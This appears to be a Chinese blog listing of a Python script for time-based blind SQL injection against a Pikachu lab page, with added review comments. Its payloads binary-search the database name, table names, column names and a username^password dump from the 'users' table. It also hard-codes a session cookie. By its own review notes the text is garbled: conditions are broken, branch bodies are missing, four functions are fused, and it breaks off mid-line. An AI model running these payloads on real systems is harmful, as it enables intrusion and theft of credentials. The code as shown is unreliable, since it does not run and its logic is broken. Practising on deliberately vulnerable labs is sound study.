一、python代码
以下代码可自用,未经许可不可转载
#!/usr/bin/python3
# coding=utf-8
"""
functions for time-based sql injection(blind)
:copyright: Copyright (c) 2019, Fancy Xiang. All rights reserved.
:license: GNU General Public License v3.0, see LICENSE for more details.
"""
import requests
# Endpoint carrying the time-based blind injection (a Pikachu lab URL here); point it at the real target.
url = "http://192.168.101.16/pikachu/vul/sqli/sqli_blind_t.php"
# Headers sent with every probe.  NOTE(review): the Cookie is a live PHPSESSID, i.e. a session
# secret hard-coded in source -- treat it as a credential: rotate it and never commit a real one.
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
    "Cookie": "PHPSESSID=7qgjcq21lsq834acodn0mo7km3",
}
# Candidate alphabet for character-by-character extraction: every printable ASCII character
# from '!' (33) to '~' (126) -- digits, upper/lower-case letters and visible punctuation; no space.
keylist = [chr(code) for code in range(ord("!"), ord("~") + 1)]
def CurrentDatabaseTime():
    """Time-based blind SQLi probe: binary-search ``length(database())`` via the GET ``name`` parameter.

    Each probe injects ``if(<cond>, sleep(3), 1)``.  Because the request is sent with
    ``timeout=2``, a fired ``sleep(3)`` surfaces as an exception, which the loop reads as
    "condition true"; a normal response means "condition false".  ``url`` and ``headers``
    are the module-level settings above.

    NOTE(review): the page this listing was taken from dropped every ``<...>`` span during
    HTML extraction, so the ``if``/``elif`` conditions are garbled (``j3``, ``j-kk``) and the
    bodies of the ``elif`` branches are missing.  The text below does not run as shown and
    appears to fuse four separate functions (database name, tables, columns, rows); only
    the length-search ``if`` body of each survives.
    """
    n: int = 10  # guessed upper bound on the length being searched; adjust to the target
    k: int = 0  # lower bound of the search interval
    j: int = n//2  # current probe value
    length: int = 0  # unused in the visible part; presumably set once the bounds meet -- TODO confirm
    db: str = str()  # unused in the visible part; presumably accumulates extracted characters -- TODO confirm
    while True:
        # NOTE(review): garbled by extraction; most likely read ``if j>k and j<n and n-j>3:``
        if j>k and j3:
            # All payloads must be adapted to the target: ``lili'`` closes the original quote,
            # ``-- ss`` comments out the remainder of the server-side query.
            payload1 = "lili' and if(length(database())>"+str(j)+",sleep(3),1)-- ss"
            param = {
                "name":payload1,
                "submit":"查询",
            }
            try:
                # Written for a GET injection; for POST change the method and arguments here
                # (and in every other function).  Returning normally means the sleep did not
                # fire, i.e. length <= j, so the upper bound moves down to j.
                response = requests.get(url, params = param, headers = headers,timeout=2)
                k=k  # no-op, kept from the original
                n=j
            # NOTE(review): a bare except treats any failure (connection refused, DNS error,
            # a slow network) as "sleep fired"; ``except requests.exceptions.Timeout`` is the
            # intended signal and would avoid false positives.
            except:
                n=n  # no-op, kept from the original
                k=j  # timeout: length > j, so the lower bound moves up to j
            # NOTE(review): this is half the remaining width, not the midpoint
            # ``k + (n-k)//2``; once k > 0 it can fall below k.  Confirm against the
            # missing ``elif`` branch before relying on it.
            j=(n-k)//2
        # NOTE(review): extraction fused two things on this line: the head of this function's
        # ``elif j-k==3 or j-k<3:`` branch (body lost) and the ``if j>k and j<n and n-j>3:``
        # of what looks like the next function.  From payload4 on the lines appear to belong
        # to a table-enumeration routine, not to this function.
        elif j-k==3 or j-kk and j3:
            # Length of the comma-joined table names of the current database.
            payload4 = "lili' and if((length((select group_concat(table_name) from information_schema.tables where table_schema = database())))>"+str(j)+",sleep(3),1)-- ss"
            param = {
                "name":payload4,
                "submit":"查询",
            }
            try:
                # Same GET probe: no exception => condition false => upper bound moves down.
                response = requests.get(url, params = param, headers = headers,timeout=2)
                k=k
                n=j
            except:  # bare except: see the note on the first probe above
                n=n
                k=j
            j=(n-k)//2
        # NOTE(review): same fusion as above; payload7 on appears to come from a
        # column-enumeration routine.
        elif j-k==3 or j-kk and j3:
            # Length of the comma-joined column names of table ``users``.  This filters on
            # table_name only -- unlike payload4 there is no ``table_schema = database()``
            # clause, so a same-named table in another schema would be mixed in.
            payload7 = "lili' and if((length((select group_concat(column_name) from information_schema.columns where table_name = 'users')))>"+str(j)+",sleep(3),1)-- ss"
            param = {
                "name":payload7,
                "submit":"查询",
            }
            try:
                # Same GET probe as above.
                response = requests.get(url, params = param, headers = headers,timeout=2)
                k=k
                n=j
            except:  # bare except: see the note on the first probe above
                n=n
                k=j
            j=(n-k)//2
        # NOTE(review): same fusion as above; payload10 on appears to come from the
        # credential-dump routine.
        elif j-k==3 or j-kk and j3:
            # Length of every ``username^password`` pair concatenated from ``users``.
            payload10 = "lili' and if((length((select group_concat(concat(username,'^',password)) from users)))>"+str(j)+",sleep(3),1)-- ss"
            param = {
                "name":payload10,
                "submit":"查询",
            }
            try:
                # Same GET probe as above.
                response = requests.get(url, params = param, headers = headers,timeout=2)
                k=k
                n=j
            except:  # bare except: see the note on the first probe above
                n=n
                k=j
            j=(n-k)//2
        # NOTE(review): the listing is cut off here by the extraction; the condition, its
        # body and the rest of the script are lost.
        elif j-k==3 or j-k